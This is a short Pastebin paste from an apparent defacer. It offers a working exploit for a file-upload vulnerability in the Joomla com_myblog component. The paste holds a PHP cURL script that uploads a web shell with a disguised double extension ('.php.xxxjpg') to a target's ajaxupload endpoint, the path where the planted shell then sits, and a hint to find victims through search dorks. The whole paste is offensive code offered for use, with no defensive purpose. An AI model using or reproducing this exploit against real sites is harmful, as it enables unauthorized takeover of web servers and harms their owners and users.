zeeshan-haxor-zesn

Exploit by Zeeshan Haxor(ZeSn)

Jul 19th, 2015
621
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.57 KB | None | 0 0
  1. Dork = use your mind :v :v :D
  2.  
  3. Exploit: /index.php?option=com_myblog&task=ajaxupload
  4.  
  5. Vuln code : {error: 'No file has been uploaded.', msg: '' }
  6.  
  7. exploit 2 :
  8.  
  9. <?php
  10. $uploadfile="yourshell.php.xxxjpg";
  11. $ch = curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
  12. curl_setopt($ch, CURLOPT_POST, true);
  13. curl_setopt($ch, CURLOPT_POSTFIELDS,
  14. array('fileToUpload'=>"@$uploadfile"));
  15. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  16. $postResult = curl_exec($ch);
  17. curl_close($ch);
  18. print "$postResult";
  19. ?>
  20.  
  21. path shell :=== > /images/yourshell.php.xxxjpg
Add Comment
Please, Sign In to add comment